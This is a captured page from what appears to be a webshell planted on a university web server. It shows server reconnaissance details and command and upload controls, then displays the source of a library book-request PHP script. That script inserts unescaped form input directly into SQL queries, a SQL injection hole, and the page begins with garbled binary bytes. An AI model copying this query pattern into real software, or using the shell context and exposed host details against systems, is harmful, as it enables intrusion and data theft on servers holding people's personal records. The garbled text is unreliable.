h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/5800/root/var/www/html/sb2/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/5800/root/var/www/html/sb2/pages/searchbook_add_db.php
<?ob_start();?>
<?php session_start();?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>
<?php
if ($_POST["submit"])
{
 if( (empty($_SESSION['captcha_code'] ) || strcasecmp($_SESSION['captcha_code'], $_POST['captcha_code']) != 0)  ) {  
  $msg="<br><span style='color:red'>รหัสตรวจสอบไม่ถูกต้อง!</span>";// Captcha verification is incorrect.	
  echo "<p>" . $msg . "</p>";	
?>
<a href="javascript:history.back(1);">คลิกที่นี่เพื่อกลับหน้าที่แล้ว</a>
<?php			
 } else { // if( (empty($_SESSION['captcha_code'] ) || strcasecmp($_SESSION['captcha_code'], $_POST['captcha_code']) != 0)  ) {  

	$num_books = 10;
	$prefix_id = (isset($_POST["prefix_id"])) ? $_POST["prefix_id"] : '';
	$firstname = (isset($_POST["firstname"])) ? $_POST["firstname"] : '';
	$lastname = (isset($_POST["lastname"])) ? $_POST["lastname"] : '';
	$user_type_code = (isset($_POST["user_type_code"])) ? $_POST["user_type_code"] : '';
	$faculty_id = (isset($_POST["faculty_id"])) ? $_POST["faculty_id"] : '';
	$program = (isset($_POST["program"])) ? $_POST["program"] : '';	
	$phone = (isset($_POST["phone"])) ? $_POST["phone"] : '';
	$email = (isset($_POST["email"])) ? $_POST["email"] : '';
	$note = (isset($_POST["note"])) ? $_POST["note"] : '';
	$receive_method_id = (isset($_POST["receive_method_id"])) ? $_POST["receive_method_id"] : '';

	if ( ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($user_type_code<>"") && ($faculty_id<>"") && ($program<>"") && ($phone<>"") && ($email<>"")  )
	{
		$book_detail_ok = 0;
		$message_book = "<BR>กรุณากรอกข้อมูลหนังสือที่ต้องการใช้บริการค้นหาตัวเล่ม";
		for($i=1;$i<=$num_books;$i++) {
			$tinput_name = "tid" . $i;
			$ainput_name = "aid" . $i;
			$cinput_name = "cid" . $i;
			$tinput = (isset($_POST[$tinput_name])) ? $_POST[$tinput_name] : '';
			$ainput = (isset($_POST[$ainput_name])) ? $_POST[$ainput_name] : '';
			$cinput = (isset($_POST[$cinput_name])) ? $_POST[$cinput_name] : '';
			if ( $tinput<>"" || $ainput<>"" || $cinput<>"" ) {
				if ( $tinput<>"" && $ainput<>"" && $cinput<>"" ) {
					$book_detail_ok = 1;
				} else { //if ( $tinput<>"" && $ainput<>"" && $cinput<>"" ) {
					$book_detail_ok = 0;
					$message_book = "<BR>กรุณากรอกรายละเอียดหนังสือให้ครบ<br>" . "ชื่อเรื่อง : " . $tinput . "<BR>" . "ชื่อผู้แต่ง : " . $ainput . "<BR>" . "เลขเรียกหนังสือ : " . $cinput; 
				}	 //if ( $tinput<>"" && $ainput<>"" && $cinput<>"" ) {
			} //if ( $tinput<>"" || $ainput<>"" || $cinput<>"" ) {
		} //for($i=1;$i<=$num_books;$i++) {	
		if($book_detail_ok==1) {
			//หา request_number
			$sql = "SELECT request_number FROM request_list ORDER BY request_number DESC";
			$query = mysqli_query($conn,$sql);	
			if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
				$new_request_number=$result["request_number"]+1;		
			} else {  //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
				$new_request_number=1;
			} //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
				
			//บันทึกลงในตาราง request_list
			$default_status_id = 0;
			$sql = "INSERT INTO request_list ";
			$sql .="(request_number,prefix_id,firstname,lastname,user_type_code,faculty_id,program,phone,email,status_id,receive_method_id) ";
			$sql .="VALUES ";
			$sql .="(" . $new_request_number . " ";	
			$sql .="," . $prefix_id . " ";
			$sql .=",'" . $firstname . "' ";
			$sql .=",'" . $lastname . "' ";
			$sql .=",'" . $user_type_code . "' ";			
			$sql .="," . $faculty_id . " ";
			$sql .=",'" . $program . "' ";			
			$sql .=",'" . $phone . "' ";
			$sql .=",'" . $email . "' ";
			$sql .="," . $default_status_id . " ";
			$sql .="," . 1 . ") ";

			$query = mysqli_query($conn,$sql);
			
			if($query)
			{
				//บันทึกลงในตาราง request_item
				for($i=1;$i<=$num_books;$i++) {
					$tinput_name = "tid" . $i;
					$ainput_name = "aid" . $i;
					$cinput_name = "cid" . $i;
					$tinput = (isset($_POST[$tinput_name])) ? $_POST[$tinput_name] : '';
					$ainput = (isset($_POST[$ainput_name])) ? $_POST[$ainput_name] : '';
					$cinput = (isset($_POST[$cinput_name])) ? $_POST[$cinput_name] : '';
					if ( $tinput<>"" && $ainput<>"" && $cinput<>"" ) {					
						$sql2 = "INSERT INTO request_item ";
						$sql2 .="(request_number,title,author,callnumber) ";
						$sql2 .="VALUES ";
						$sql2 .="(". $new_request_number . " ";
						$sql2 .=",'". $tinput . "' ";
						$sql2 .=",'". $ainput . "' ";
						$sql2 .=",'". $cinput . "')";
						$query2 = mysqli_query($conn,$sql2);
						if (!$query2) {
							echo "ไม่สามารถบันทึกข้อมูลได้";
						} //if (!$query2) {
					} //if ( $tinput<>"" && $ainput<>"" && $cinput<>"" ) {		
				} //for($i=1;$i<=$num_books;$i++) {
				


									
				
?>							
	<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="request_list.php"><button type="button" class="btn-success">คลิกที่นี่เพื่อดูรายการ</button></a>
<?php				
				//echo "บันทึกข้อมูลแล้ว";
				//$redirect_url = "show_agpublish.php?ap_id=" . $new_ap_id;
				//header("location:$redirect_url");
			}
			else
			{
				echo "ไม่สามารถบันทึกข้อมูลได้";
			}
		} else { //if($book_detail_ok==1) {
			echo $message_book;
?>
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php		
		} //if($book_detail_ok==1) {		
	} else { //	if (($room_code<>"") && ($<reserve_date>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty<>"") && ($phone<>"") && ($email<>""))
?>	
	<BR />กรุณากรอกข้อมูลให้ครบถ้วน
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
	}  //	if (($room_code<>"") && ($<reserve_date>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty<>"") && ($phone<>"") && ($email<>""))
 } // if( (empty($_SESSION['captcha_code'] ) || strcasecmp($_SESSION['captcha_code'], $_POST['captcha_code']) != 0)  ) {  
} //if ($_POST["submit"])
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit